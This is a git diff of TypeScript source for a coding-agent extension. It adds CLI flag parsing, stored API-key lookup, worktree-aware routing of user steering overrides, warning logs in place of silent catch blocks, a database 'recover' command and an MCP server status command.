+function resolveCodebaseOptions(args: string, ctx: ExtensionCommandContext): CodebaseMapOptions | false {
+  // Load preferences defaults
+  const prefs = loadEffectiveGSDPreferences()?.preferences?.codebase;
+
+  // Parse CLI flags
+  const maxFilesStr = extractFlag(args, "--max-files");
+  const collapseStr = extractFlag(args, "--collapse-threshold");
+
+  // Validate --max-files
+  let maxFiles: number | undefined;
+  if (maxFilesStr) {
+    maxFiles = parseInt(maxFilesStr, 10);
+    if (isNaN(maxFiles) || maxFiles < 1) {
+      ctx.ui.notify("--max-files must be a positive integer (e.g. --max-files 200).", "warning");
+      return false;
+    }
+  }
+
+  // Validate --collapse-threshold
+  let collapseThreshold: number | undefined;
+  if (collapseStr) {
+    collapseThreshold = parseInt(collapseStr, 10);
+    if (isNaN(collapseThreshold) || collapseThreshold < 1) {
+      ctx.ui.notify("--collapse-threshold must be a positive integer (e.g. --collapse-threshold 15).", "warning");
+      return false;
+    }
+  }
+
+  return {
+    // CLI flags override preferences
+    maxFiles: maxFiles ?? prefs?.max_files,
+    collapseThreshold: collapseThreshold ?? prefs?.collapse_threshold,
+    excludePatterns: prefs?.exclude_patterns,
+  };
+}
+
+function extractFlag(args: string, flag: string): string | undefined {
+  const escaped = flag.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
+  const regex = new RegExp(`${escaped}[=\\s]+(\\S+)`);
+  const match = args.match(regex);
+  return match?.[1];
+}
diff --git a/src/resources/extensions/gsd/commands-config.ts b/src/resources/extensions/gsd/commands-config.ts
index ec5a8b596..01cf58c14 100644
--- a/src/resources/extensions/gsd/commands-config.ts
+++ b/src/resources/extensions/gsd/commands-config.ts
@@ -22,6 +22,12 @@ export const TOOL_KEYS = [
   { id: "groq",     env: "GROQ_API_KEY",      label: "Groq Voice",        hint: "console.groq.com" },
 ] as const;
 
+function getStoredToolKey(auth: AuthStorage, providerId: string): string | undefined {
+  const creds = auth.getCredentialsForProvider(providerId);
+  const cred = creds.find((c) => c.type === "api_key" && c.key);
+  return cred?.type === "api_key" ? cred.key : undefined;
+}
+
 /**
  * Load tool API keys from auth.json into environment variables.
  * Called at session startup to ensure tools have access to their credentials.
@@ -33,9 +39,9 @@ export function loadToolApiKeys(): void {
 
     const auth = AuthStorage.create(authPath);
     for (const tool of TOOL_KEYS) {
-      const cred = auth.get(tool.id);
-      if (cred && cred.type === "api_key" && cred.key && !process.env[tool.env]) {
-        process.env[tool.env] = cred.key;
+      const key = getStoredToolKey(auth, tool.id);
+      if (key && !process.env[tool.env]) {
+        process.env[tool.env] = key;
       }
     }
   } catch {
@@ -55,14 +61,14 @@ export async function handleConfig(ctx: ExtensionCommandContext): Promise<void>
   // Show current status
   const statusLines = ["GSD Tool Configuration\n"];
   for (const tool of TOOL_KEYS) {
-    const hasKey = !!process.env[tool.env] || !!(auth.get(tool.id) as { key?: string })?.key;
+    const hasKey = !!process.env[tool.env] || !!getStoredToolKey(auth, tool.id);
     statusLines.push(`  ${hasKey ? "\u2713" : "\u2717"} ${tool.label}${hasKey ? "" : ` \u2014 get key at ${tool.hint}`}`);
   }
   ctx.ui.notify(statusLines.join("\n"), "info");
 
   // Ask which tools to configure
   const options = TOOL_KEYS.map(t => {
-    const hasKey = !!process.env[t.env] || !!(auth.get(t.id) as { key?: string })?.key;
+    const hasKey = !!process.env[t.env] || !!getStoredToolKey(auth, t.id);
     return `${t.label} ${hasKey ? "(configured \u2713)" : "(not set)"}`;
   });
   options.push("(done)");
diff --git a/src/resources/extensions/gsd/commands-extensions.ts b/src/resources/extensions/gsd/commands-extensions.ts
index e63f90405..05b867e4f 100644
--- a/src/resources/extensions/gsd/commands-extensions.ts
+++ b/src/resources/extensions/gsd/commands-extensions.ts
@@ -105,7 +105,7 @@ function discoverManifests(): Map<string, ExtensionManifest> {
   const manifests = new Map<string, ExtensionManifest>();
   if (!existsSync(extDir)) return manifests;
   for (const entry of readdirSync(extDir, { withFileTypes: true })) {
-    if (!entry.isDirectory()) continue;
+    if (!entry.isDirectory() && !entry.isSymbolicLink()) continue;
     const m = readManifest(join(extDir, entry.name));
     if (m) manifests.set(m.id, m);
   }
diff --git a/src/resources/extensions/gsd/commands-handlers.ts b/src/resources/extensions/gsd/commands-handlers.ts
index e43ecb0fa..16af7230b 100644
--- a/src/resources/extensions/gsd/commands-handlers.ts
+++ b/src/resources/extensions/gsd/commands-handlers.ts
@@ -20,7 +20,8 @@ import {
   selectDoctorScope,
   filterDoctorIssues,
 } from "./doctor.js";
-import { isAutoActive } from "./auto.js";
+import { isAutoActive, checkRemoteAutoSession } from "./auto.js";
+import { getAutoWorktreePath } from "./auto-worktree.js";
 import { projectRoot } from "./commands/context.js";
 import { loadPrompt } from "./prompt-loader.js";
 
@@ -42,21 +43,27 @@ export function dispatchDoctorHeal(pi: ExtensionAPI, scope: string | undefined,
   );
 }
 
-export async function handleDoctor(args: string, ctx: ExtensionCommandContext, pi: ExtensionAPI): Promise<void> {
+/** Parse doctor command args into structured flags and positionals (pure, no I/O). */
+export function parseDoctorArgs(args: string) {
   const trimmed = args.trim();
-  // Extract flags before positional parsing
   const jsonMode = trimmed.includes("--json");
   const dryRun = trimmed.includes("--dry-run");
+  const fixFlag = trimmed.includes("--fix");
   const includeBuild = trimmed.includes("--build");
   const includeTests = trimmed.includes("--test");
-  const stripped = trimmed.replace(/--json|--dry-run|--build|--test/g, "").trim();
+  const stripped = trimmed.replace(/--json|--dry-run|--build|--test|--fix/g, "").trim();
   const parts = stripped ? stripped.split(/\s+/) : [];
   const mode = parts[0] === "fix" || parts[0] === "heal" || parts[0] === "audit" ? parts[0] : "doctor";
   const requestedScope = mode === "doctor" ? parts[0] : parts[1];
+  return { jsonMode, dryRun, fixFlag, includeBuild, includeTests, mode, requestedScope };
+}
+
+export async function handleDoctor(args: string, ctx: ExtensionCommandContext, pi: ExtensionAPI): Promise<void> {
+  const { jsonMode, dryRun, fixFlag, includeBuild, includeTests, mode, requestedScope } = parseDoctorArgs(args);
   const scope = await selectDoctorScope(projectRoot(), requestedScope);
   const effectiveScope = mode === "audit" ? requestedScope : scope;
   const report = await runGSDDoctor(projectRoot(), {
-    fix: mode === "fix" || mode === "heal" || dryRun,
+    fix: mode === "fix" || mode === "heal" || dryRun || fixFlag,
     dryRun,
     scope: effectiveScope,
     includeBuild,
@@ -82,7 +89,7 @@ export async function handleDoctor(args: string, ctx: ExtensionCommandContext, p
       scope: effectiveScope,
       includeWarnings: true,
     });
-    const actionable = unresolved.filter(issue => issue.severity === "error" || issue.code === "all_tasks_done_missing_slice_uat" || issue.code === "slice_checked_missing_uat");
+    const actionable = unresolved.filter(issue => issue.severity === "error");
     if (actionable.length === 0) {
       ctx.ui.notify("Doctor heal found nothing actionable to hand off to the LLM.", "info");
       return;
@@ -222,7 +229,19 @@ export async function handleSteer(change: string, ctx: ExtensionCommandContext,
   const sid = state.activeSlice?.id ?? "none";
   const tid = state.activeTask?.id ?? "none";
   const appliedAt = `${mid}/${sid}/${tid}`;
-  await appendOverride(basePath, change, appliedAt);
+
+  // Resolve the correct target path: only route to a worktree when auto-mode
+  // is actively running there (in-process or remote). A worktree directory may
+  // exist from a previous session without being the active runtime path —
+  // writing there without a live session would silently drop the override.
+  const autoRunning = isAutoActive() || checkRemoteAutoSession(basePath).running;
+  const wtPath = autoRunning && mid !== "none"
+    ? getAutoWorktreePath(basePath, mid)
+    : null;
+  const targetPath = wtPath ?? basePath;
+  await appendOverride(targetPath, change, appliedAt);
+
+  const overrideLoc = wtPath ? "worktree `.gsd/OVERRIDES.md`" : "`.gsd/OVERRIDES.md`";
 
   if (isAutoActive()) {
     pi.sendMessage({
@@ -232,14 +251,14 @@ export async function handleSteer(change: string, ctx: ExtensionCommandContext,
         "",
         `**Override:** ${change}`,
         "",
-        "This override has been saved to `.gsd/OVERRIDES.md` and will be injected into all future task prompts.",
+        `This override has been saved to ${overrideLoc} and will be injected into all future task prompts.`,
         "A document rewrite unit will run before the next task to propagate this change across all active plan documents.",
         "",
         "If you are mid-task, finish your current work respecting this override. The next dispatched unit will be a document rewrite.",
       ].join("\n"),
       display: false,
     }, { triggerTurn: true });
-    ctx.ui.notify(`Override registered: "${change}". Will be applied before next task dispatch.`, "info");
+    ctx.ui.notify(`Override registered (${overrideLoc}): "${change}". Will be applied before next task dispatch.`, "info");
   } else {
     pi.sendMessage({
       customType: "gsd-hard-steer",
@@ -248,13 +267,13 @@ export async function handleSteer(change: string, ctx: ExtensionCommandContext,
         "",
         `**Override:** ${change}`,
         "",
-        "This override has been saved to `.gsd/OVERRIDES.md`.",
-        "Before continuing, read `.gsd/OVERRIDES.md` and update the current plan documents to reflect this change.",
+        `This override has been saved to ${overrideLoc}.`,
+        `Before continuing, read ${overrideLoc} and update the current plan documents to reflect this change.`,
         "Focus on: active slice plan, incomplete task plans, and DECISIONS.md.",
       ].join("\n"),
       display: false,
     }, { triggerTurn: true });
-    ctx.ui.notify(`Override registered: "${change}". Update plan documents to reflect this change.`, "info");
+    ctx.ui.notify(`Override registered (${overrideLoc}): "${change}". Update plan documents to reflect this change.`, "info");
   }
 }
 
diff --git a/src/resources/extensions/gsd/commands-inspect.ts b/src/resources/extensions/gsd/commands-inspect.ts
index 87eb494b1..5421c00bf 100644
--- a/src/resources/extensions/gsd/commands-inspect.ts
+++ b/src/resources/extensions/gsd/commands-inspect.ts
@@ -8,6 +8,7 @@ import type { ExtensionCommandContext } from "@gsd/pi-coding-agent";
 import { existsSync } from "node:fs";
 import { join } from "node:path";
 import { gsdRoot } from "./paths.js";
+import { logWarning } from "./workflow-logger.js";
 import { getErrorMessage } from "./error-utils.js";
 
 export interface InspectData {
@@ -92,7 +93,7 @@ export async function handleInspect(ctx: ExtensionCommandContext): Promise<void>
 
     ctx.ui.notify(formatInspectOutput(data), "info");
   } catch (err) {
-    process.stderr.write(`gsd-db: /gsd inspect failed: ${getErrorMessage(err)}\n`);
+    logWarning("command", `/gsd inspect failed: ${getErrorMessage(err)}`);
     ctx.ui.notify("Failed to inspect GSD database. Check stderr for details.", "error");
   }
 }
diff --git a/src/resources/extensions/gsd/commands-maintenance.ts b/src/resources/extensions/gsd/commands-maintenance.ts
index 5b6c4b8ff..09d9df9dc 100644
--- a/src/resources/extensions/gsd/commands-maintenance.ts
+++ b/src/resources/extensions/gsd/commands-maintenance.ts
@@ -1,18 +1,20 @@
 /**
- * GSD Maintenance — cleanup, skip, and dry-run handlers.
+ * GSD Maintenance — cleanup, skip, dry-run, and recover handlers.
  *
- * Contains: handleCleanupBranches, handleCleanupSnapshots, handleCleanupWorktrees, handleSkip, handleDryRun
+ * Contains: handleCleanupBranches, handleCleanupSnapshots, handleCleanupWorktrees, handleSkip, handleDryRun, handleRecover
  */
 
 import type { ExtensionCommandContext } from "@gsd/pi-coding-agent";
 import { deriveState } from "./state.js";
 import { nativeBranchList, nativeDetectMainBranch, nativeBranchListMerged, nativeBranchDelete, nativeForEachRef, nativeUpdateRef } from "./native-git-bridge.js";
+import { logWarning } from "./workflow-logger.js";
 
 export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePath: string): Promise<void> {
   let branches: string[];
   try {
     branches = nativeBranchList(basePath, "gsd/*");
-  } catch {
+  } catch (e) {
+    logWarning("command", `branch list failed: ${(e as Error).message}`);
     ctx.ui.notify("No GSD branches to clean up.", "info");
     return;
   }
@@ -23,7 +25,8 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa
   let merged: string[];
   try {
     merged = nativeBranchListMerged(basePath, mainBranch, "gsd/*");
-  } catch {
+  } catch (e) {
+    logWarning("command", `merged branch list failed: ${(e as Error).message}`);
     merged = [];
   }
 
@@ -33,8 +36,8 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa
     try {
       nativeBranchDelete(basePath, branch, false);
       deletedMerged++;
-    } catch {
-      /* skip branches that cannot be deleted */
+    } catch (e) {
+      logWarning("command", `branch delete failed for ${branch}: ${(e as Error).message}`);
     }
   }
 
@@ -44,8 +47,10 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa
   try {
     const { listWorktrees } = await import("./worktree-manager.js");
     const { resolveMilestoneFile } = await import("./paths.js");
-    const { loadFile, parseRoadmap } = await import("./files.js");
+    const { loadFile } = await import("./files.js");
+    const { parseRoadmap } = await import("./parsers-legacy.js");
     const { isMilestoneComplete } = await import("./state.js");
+    const { isDbAvailable, getMilestone } = await import("./gsd-db.js");
 
     const attachedBranches = new Set(
       listWorktrees(basePath).map((wt) => wt.branch),
@@ -54,12 +59,29 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa
     for (const branch of milestoneBranches) {
       if (attachedBranches.has(branch)) continue;
       const milestoneId = branch.replace(/^milestone\//, "");
+
+      // DB-first: check milestone status directly
+      if (isDbAvailable()) {
+        const dbRow = getMilestone(milestoneId);
+        if (dbRow) {
+          if (dbRow.status !== "complete" && dbRow.status !== "done") continue;
+          // Milestone is complete per DB — proceed to delete branch
+          try {
+            nativeBranchDelete(basePath, branch, true);
+            deletedStaleMilestones++;
+          } catch (e) { logWarning("command", `stale milestone branch delete failed for ${branch}: ${(e as Error).message}`); }
+          continue;
+        }
+      }
+
+      // Filesystem fallback
       const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP");
       if (!roadmapPath) continue;
       let roadmapContent: string | null = null;
       try {
         roadmapContent = await loadFile(roadmapPath);
-      } catch {
+      } catch (e) {
+        logWarning("command", `loadFile failed for ${roadmapPath}: ${(e as Error).message}`);
         roadmapContent = null;
       }
       if (!roadmapContent) continue;
@@ -67,12 +89,12 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa
       try {
         nativeBranchDelete(basePath, branch, true);
         deletedStaleMilestones++;
-      } catch {
-        /* non-fatal */
+      } catch (e) {
+        logWarning("command", `milestone branch delete failed for ${branch}: ${(e as Error).message}`);
       }
     }
-  } catch {
-    /* non-fatal */
+  } catch (e) {
+    logWarning("command", `stale milestone cleanup failed: ${(e as Error).message}`);
   }
 
   const summary: string[] = [];
@@ -104,7 +126,8 @@ export async function handleCleanupSnapshots(ctx: ExtensionCommandContext, baseP
   let refs: string[];
   try {
     refs = nativeForEachRef(basePath, "refs/gsd/snapshots/");
-  } catch {
+  } catch (e) {
+    logWarning("command", `snapshot ref list failed: ${(e as Error).message}`);
     ctx.ui.notify("No snapshot refs to clean up.", "info");
     return;
   }
@@ -129,8 +152,8 @@ export async function handleCleanupSnapshots(ctx: ExtensionCommandContext, baseP
       try {
         nativeUpdateRef(basePath, old);
         pruned++;
-      } catch {
-        /* skip individual failures */
+      } catch (e) {
+        logWarning("command", `snapshot ref update failed for ${old}: ${(e as Error).message}`);
       }
     }
   }
@@ -146,7 +169,8 @@ export async function handleCleanupWorktrees(ctx: ExtensionCommandContext, baseP
   let statuses;
   try {
     statuses = getAllWorktreeHealth(basePath);
-  } catch {
+  } catch (e) {
+    logWarning("command", `worktree health inspection failed: ${(e as Error).message}`);
     ctx.ui.notify("Failed to inspect worktrees.", "error");
     return;
   }
@@ -179,7 +203,8 @@ export async function handleCleanupWorktrees(ctx: ExtensionCommandContext, baseP
         removeWorktree(basePath, wt.name, { deleteBranch: true });
         lines.push(`  ✓ ${wt.name}  removed (branch ${wt.branch} deleted)`);
         removed++;
-      } catch {
+      } catch (e) {
+        logWarning("command", `worktree removal failed for ${wt.name}: ${(e as Error).message}`);
         lines.push(`  ✗ ${wt.name}  failed to remove`);
       }
     }
@@ -228,7 +253,7 @@ export async function handleSkip(unitArg: string, ctx: ExtensionCommandContext,
     if (fileExists(completedKeysFile)) {
       keys = JSON.parse(readFile(completedKeysFile, "utf-8"));
     }
-  } catch { /* start fresh */ }
+  } catch (e) { logWarning("command", `completed-units.json parse failed: ${(e as Error).message}`); }
 
   // Normalize: accept "execute-task/M001/S01/T03", "M001/S01/T03", or just "T03"
   let skipKey = unitArg;
@@ -353,7 +378,8 @@ export async function handleCleanupProjects(args: string, ctx: ExtensionCommandC
     hashList = readdirSync(projectsDir, { withFileTypes: true })
       .filter(e => e.isDirectory())
       .map(e => e.name);
-  } catch {
+  } catch (e) {
+    logWarning("command", `readdir failed for project-state directory: ${(e as Error).message}`);
     ctx.ui.notify(`Failed to read project-state directory at ${projectsDir}.`, "error");
     return;
   }
@@ -436,7 +462,8 @@ export async function handleCleanupProjects(args: string, ctx: ExtensionCommandC
       try {
         fsRmSync(pathJoin(projectsDir, e.hash), { recursive: true, force: true });
         removed++;
-      } catch {
+      } catch (err) {
+        logWarning("command", `project cleanup rm failed for ${e.hash}: ${(err as Error).message}`);
         failed.push(e.hash);
       }
     }
@@ -450,3 +477,68 @@ export async function handleCleanupProjects(args: string, ctx: ExtensionCommandC
 
   ctx.ui.notify(lines.join("\n"), "info");
 }
+
+/**
+ * `gsd recover` — Reconstruct DB hierarchy state from rendered markdown on disk.
+ *
+ * Deletes milestones, slices, and tasks table rows (preserves decisions,
+ * requirements, artifacts, memories), re-runs `migrateHierarchyToDb()` to
+ * repopulate from markdown, then calls `deriveState()` to verify sanity.
+ *
+ * Prints counts of recovered items and the resulting project phase.
+ */
+export async function handleRecover(ctx: ExtensionCommandContext, basePath: string): Promise<void> {
+  const { isDbAvailable: dbAvailable, _getAdapter, transaction: dbTransaction } = await import("./gsd-db.js");
+  const { migrateHierarchyToDb } = await import("./md-importer.js");
+  const { invalidateStateCache } = await import("./state.js");
+
+  if (!dbAvailable()) {
+    ctx.ui.notify("gsd recover: No database open. Run a GSD command first to initialize the DB.", "error");
+    return;
+  }
+
+  try {
+    // 1. Delete + re-populate inside a single transaction for atomicity
+    const db = _getAdapter()!;
+    const counts = dbTransaction(() => {
+      db.exec("DELETE FROM tasks");
+      db.exec("DELETE FROM slices");
+      db.exec("DELETE FROM milestones");
+      return migrateHierarchyToDb(basePath);
+    });
+
+    // 3. Invalidate state cache so deriveState() picks up fresh DB data
+    invalidateStateCache();
+
+    // 4. Derive state to verify sanity
+    const state = await deriveState(basePath);
+
+    // 5. Report
+    const lines = [
+      `gsd recover: reconstructed hierarchy from markdown`,
+      `  Milestones: ${counts.milestones}`,
+      `  Slices:     ${counts.slices}`,
+      `  Tasks:      ${counts.tasks}`,
+      ``,
+      `  Phase:      ${state.phase}`,
+    ];
+    if (state.activeMilestone) {
+      lines.push(`  Active:     ${state.activeMilestone.id}: ${state.activeMilestone.title}`);
+    }
+    if (state.activeSlice) {
+      lines.push(`  Slice:      ${state.activeSlice.id}: ${state.activeSlice.title}`);
+    }
+    if (state.activeTask) {
+      lines.push(`  Task:       ${state.activeTask.id}: ${state.activeTask.title}`);
+    }
+
+    process.stderr.write(
+      `gsd-recover: recovered ${counts.milestones}M/${counts.slices}S/${counts.tasks}T hierarchy\n`,
+    );
+    ctx.ui.notify(lines.join("\n"), "success");
+  } catch (err) {
+    const msg = err instanceof Error ? err.message : String(err);
+    logWarning("command", `recover failed: ${msg}`);
+    ctx.ui.notify(`gsd recover failed: ${msg}`, "error");
+  }
+}
diff --git a/src/resources/extensions/gsd/commands-mcp-status.ts b/src/resources/extensions/gsd/commands-mcp-status.ts
new file mode 100644
index 000000000..560e58d03
--- /dev/null
+++ b/src/resources/extensions/gsd/commands-mcp-status.ts
@@ -0,0 +1,247 @@
+/**
+ * MCP Status — `/gsd mcp` command handler.
+ *
+ * Shows configured MCP servers, their connection status, and available tools.
+ *
+ * Subcommands:
+ *   /gsd mcp             — Overview of all servers (alias: /gsd mcp status)
+ *   /gsd mcp status      — Same as bare /gsd mcp
+ *   /gsd mcp check <srv> — Detailed status for a specific server
+ */
+
+import type { ExtensionCommandContext } from "@gsd/pi-coding-agent";
+
+import { existsSync, readFileSync } from "node:fs";
+import { join } from "node:path";
+
+// ─── Types ──────────────────────────────────────────────────────────────────
+
+export interface McpServerStatus {
+  name: string;
+  transport: "stdio" | "http" | "unknown";
+  connected: boolean;
+  toolCount: number;
+  error: string | undefined;
+}
+
+export interface McpServerDetail extends McpServerStatus {
+  tools: string[];
+}
+
+// ─── Config reader (standalone — does not import mcp-client internals) ──────
+
+interface McpServerRawConfig {
+  name: string;
+  transport: "stdio" | "http" | "unknown";
+  command?: string;
+  args?: string[];
+  url?: string;
+}
+
+function readMcpConfigs(): McpServerRawConfig[] {
+  const servers: McpServerRawConfig[] = [];
+  const seen = new Set<string>();
+  const configPaths = [
+    join(process.cwd(), ".mcp.json"),
+    join(process.cwd(), ".gsd", "mcp.json"),
+  ];
+
+  for (const configPath of configPaths) {
+    try {
+      if (!existsSync(configPath)) continue;
+      const raw = readFileSync(configPath, "utf-8");
+      const data = JSON.parse(raw) as Record<string, unknown>;
+      const mcpServers = (data.mcpServers ?? data.servers) as
+        | Record<string, Record<string, unknown>>
+        | undefined;
+      if (!mcpServers || typeof mcpServers !== "object") continue;
+
+      for (const [name, config] of Object.entries(mcpServers)) {
+        if (seen.has(name)) continue;
+        seen.add(name);
+
+        const hasCommand = typeof config.command === "string";
+        const hasUrl = typeof config.url === "string";
+        const transport: McpServerRawConfig["transport"] = hasCommand
+          ? "stdio"
+          : hasUrl
+            ? "http"
+            : "unknown";
+
+        servers.push({
+          name,
+          transport,
+          ...(hasCommand && {
+            command: config.command as string,
+            args: Array.isArray(config.args) ? (config.args as string[]) : undefined,
+          }),
+          ...(hasUrl && { url: config.url as string }),
+        });
+      }
+    } catch {
+      // Non-fatal — config file may not exist or be malformed
+    }
+  }
+
+  return servers;
+}
+
+// ─── Formatters (exported for testing) ──────────────────────────────────────
+
+export function formatMcpStatusReport(servers: McpServerStatus[]): string {
+  if (servers.length === 0) {
+    return [
+      "No MCP servers configured.",
+      "",
+      "Add servers to .mcp.json or .gsd/mcp.json to enable MCP integrations.",
+      "See: https://modelcontextprotocol.io/quickstart",
+    ].join("\n");
+  }
+
+  const lines: string[] = [`MCP Server Status — ${servers.length} server(s)\n`];
+
+  for (const s of servers) {
+    const icon = s.error ? "✗" : s.connected ? "✓" : "○";
+    const status = s.error
+      ? `error: ${s.error}`
+      : s.connected
+        ? `connected — ${s.toolCount} tools`
+        : "disconnected";
+    lines.push(`  ${icon} ${s.name} (${s.transport}) — ${status}`);
+  }
+
+  lines.push("");
+  lines.push("Use /gsd mcp check <server> for details on a specific server.");
+  lines.push("Use mcp_discover to connect and list tools for a server.");
+
+  return lines.join("\n");
+}
+
+export function formatMcpServerDetail(server: McpServerDetail): string {
+  const lines: string[] = [`MCP Server: ${server.name}\n`];
+
+  lines.push(`  Transport: ${server.transport}`);
+
+  if (server.error) {
+    lines.push(`  Status:    error`);
+    lines.push(`  Error:     ${server.error}`);
+  } else if (server.connected) {
+    lines.push(`  Status:    connected`);
+    lines.push(`  Tools:     ${server.toolCount}`);
+    if (server.tools.length > 0) {
+      lines.push("");
+      lines.push("  Available tools:");
+      for (const tool of server.tools) {
+        lines.push(`    - ${tool}`);
+      }
+    }
+  } else {
+    lines.push(`  Status:    disconnected`);
+    lines.push("");
+    lines.push(`  Run mcp_discover("${server.name}") to connect and list tools.`);
+  }
+
+  return lines.join("\n");
+}
+
+// ─── Command handler ────────────────────────────────────────────────────────
+
+/**
+ * Handle `/gsd mcp [status|check <server>]`.
+ */
+export async function handleMcpStatus(
+  args: string,
+  ctx: ExtensionCommandContext,
+): Promise<void> {
+  const trimmed = args.trim().toLowerCase();
+  const configs = readMcpConfigs();
+
+  // /gsd mcp check <server>
+  if (trimmed.startsWith("check ")) {
+    const serverName = args.trim().slice("check ".length).trim();
+    const config = configs.find((c) => c.name === serverName);
+    if (!config) {
+      const available = configs.map((c) => c.name).join(", ") || "(none)";
+      ctx.ui.notify(
+        `Unknown MCP server: "${serverName}"\n\nAvailable: ${available}`,
+        "warning",
+      );
+      return;
+    }
+
+    // Try to get connection/tool info from the mcp-client module if available
+    let connected = false;
+    let toolNames: string[] = [];
+    let error: string | undefined;
+    try {
+      const mcpClient = await import("../mcp-client/index.js");
+      // Access the module's connection state if exported; fall back gracefully
+      const mod = mcpClient as Record<string, unknown>;
+      if (typeof mod.getConnectionStatus === "function") {
+        const status = (mod.getConnectionStatus as (name: string) => { connected: boolean; tools: string[]; error?: string })(serverName);
+        connected = status.connected;
+        toolNames = status.tools;
+        error = status.error;
+      }
+    } catch {
+      // mcp-client may not expose status helpers — that's fine
+    }
+
+    ctx.ui.notify(
+      formatMcpServerDetail({
+        name: config.name,
+        transport: config.transport,
+        connected,
+        toolCount: toolNames.length,
+        tools: toolNames,
+        error,
+      }),
+      "info",
+    );
+    return;
+  }
+
+  // /gsd mcp or /gsd mcp status
+  if (!trimmed || trimmed === "status") {
+    // Build status for each server
+    const statuses: McpServerStatus[] = [];
+
+    for (const config of configs) {
+      let connected = false;
+      let toolCount = 0;
+      let error: string | undefined;
+
+      try {
+        const mcpClient = await import("../mcp-client/index.js");
+        const mod = mcpClient as Record<string, unknown>;
+        if (typeof mod.getConnectionStatus === "function") {
+          const status = (mod.getConnectionStatus as (name: string) => { connected: boolean; tools: string[]; error?: string })(config.name);
+          connected = status.connected;
+          toolCount = status.tools.length;
+          error = status.error;
+        }
+      } catch {
+        // Fall back to unknown state
+      }
+
+      statuses.push({
+        name: config.name,
+        transport: config.transport,
+        connected,
+        toolCount,
+        error,
+      });
+    }
+
+    ctx.ui.notify(formatMcpStatusReport(statuses), "info");
+    return;
+  }
+
+  // Unknown subcommand
+  ctx.ui.notify(
+    "Usage: /gsd mcp [status|check <server>]\n\n" +
+    "  status           Show all MCP server statuses (default)\n" +
+    "  check <server>   Detailed status for a specific server",
+    "warning",
+  );
+}
diff --git a/src/resources/extensions/gsd/commands-prefs-wizard.ts b/src/resources/extensions/gsd/commands-prefs-wizard.ts
index 46e4b0a37..f94a78010 100644
--- a/src/resources/extensions/gsd/commands-prefs-wizard.ts
+++ b/src/resources/extensions/gsd/commands-prefs-wizard.ts
@@ -165,10 +165,10 @@ export function buildCategorySummaries(prefs: Record<string, unknown>): Record<s
   const modeSummary = mode ?? "(not set)";
 
   // Models
-  const models = prefs.models as Record<string, string> | undefined;
+  const models = prefs.models as Record<string, unknown> | undefined;
   let modelsSummary = "(not configured)";
   if (models && Object.keys(models).length > 0) {
-    const parts = Object.entries(models).map(([phase, model]) => `${phase}: ${model}`);
+    const parts = Object.entries(models).map(([phase, model]) => `${phase}: ${formatConfiguredModel(model)}`);
     modelsSummary = parts.join(", ");
   }
 
@@ -184,11 +184,23 @@ export function buildCategorySummaries(prefs: Record<string, unknown>): Record<s
 
   // Git
   const git = prefs.git as Record<string, unknown> | undefined;
+  const staleThreshold = prefs.stale_commit_threshold_minutes;
+  const absorbSnapshots = git?.absorb_snapshot_commits;
   let gitSummary = "(defaults)";
-  if (git && Object.keys(git).length > 0) {
-    const branch = git.main_branch ?? "main";
-    const push = git.auto_push ? "on" : "off";
-    gitSummary = `main: ${branch}, push: ${push}`;
+  {
+    const parts: string[] = [];
+    if (git && Object.keys(git).length > 0) {
+      const branch = git.main_branch ?? "main";
+      const push = git.auto_push ? "on" : "off";
+      parts.push(`main: ${branch}, push: ${push}`);
+    }
+    if (staleThreshold !== undefined) {
+      parts.push(`stale: ${staleThreshold === 0 ? "off" : `${staleThreshold}m`}`);
+    }
+    if (absorbSnapshots !== undefined) {
+      parts.push(`absorb: ${absorbSnapshots ? "on" : "off"}`);
+    }
+    if (parts.length > 0) gitSummary = parts.join(", ");
   }
 
   // Skills
@@ -243,9 +255,38 @@ export function buildCategorySummaries(prefs: Record<string, unknown>): Record<s
 
 // ─── Category configuration functions ────────────────────────────────────────
 
+export function formatConfiguredModel(config: unknown): string {
+  if (typeof config === "string") return config;
+  if (!config || typeof config !== "object") return "(invalid)";
+  const maybeConfig = config as { model?: unknown; provider?: unknown };
+  if (typeof maybeConfig.model !== "string" || maybeConfig.model.trim() === "") return "(invalid)";
+  if (typeof maybeConfig.provider === "string" && maybeConfig.provider && !maybeConfig.model.includes("/")) {
+    return `${maybeConfig.provider}/${maybeConfig.model}`;
+  }
+  return maybeConfig.model;
+}
+
+export function toPersistedModelId(provider: string, modelId: string): string {
+  if (!provider.trim()) return modelId;
+  const normalizedProvider = provider.trim();
+  const normalizedModelId = modelId.trim();
+  return normalizedModelId.startsWith(`${normalizedProvider}/`)
+    ? normalizedModelId
+    : `${normalizedProvider}/${normalizedModelId}`;
+}
+
 async function configureModels(ctx: ExtensionCommandContext, prefs: Record<string, unknown>): Promise<void> {
-  const modelPhases = ["research", "planning", "execution", "completion"] as const;
-  const models: Record<string, string> = (prefs.models as Record<string, string>) ?? {};
+  const modelPhases = [
+    "research",
+    "planning",
+    "discuss",
+    "execution",
+    "execution_simple",
+    "completion",
+    "validation",
+    "subagent",
+  ] as const;
+  const models: Record<string, unknown> = (prefs.models as Record<string, unknown>) ?? {};
 
   const availableModels = ctx.modelRegistry.getAvailable();
   if (availableModels.length > 0) {
@@ -265,15 +306,22 @@ async function configureModels(ctx: ExtensionCommandContext, prefs: Record<strin
       group.sort((a, b) => a.id.localeCompare(b.id));
     }
 
-    // Build provider menu with model counts
+    // Display names for providers in the preferences wizard UI.
+    const PROVIDER_DISPLAY_NAMES: Record<string, string> = { anthropic: "anthropic-api" };
+    const displayName = (p: string) => PROVIDER_DISPLAY_NAMES[p] ?? p;
+
+    // Build provider menu with model counts (display name → real name lookup)
+    const displayToReal = new Map<string, string>();
     const providerOptions = providers.map(p => {
       const count = byProvider.get(p)!.length;
-      return `${p} (${count} models)`;
+      const label = `${displayName(p)} (${count} models)`;
+      displayToReal.set(label, p);
+      return label;
     });
     providerOptions.push("(keep current)", "(clear)", "(type manually)");
 
     for (const phase of modelPhases) {
-      const current = models[phase] ?? "";
+      const current = formatConfiguredModel(models[phase]);
       const phaseLabel = `Model for ${phase} phase${current ? ` (current: ${current})` : ""}`;
 
       // Step 1: pick provider
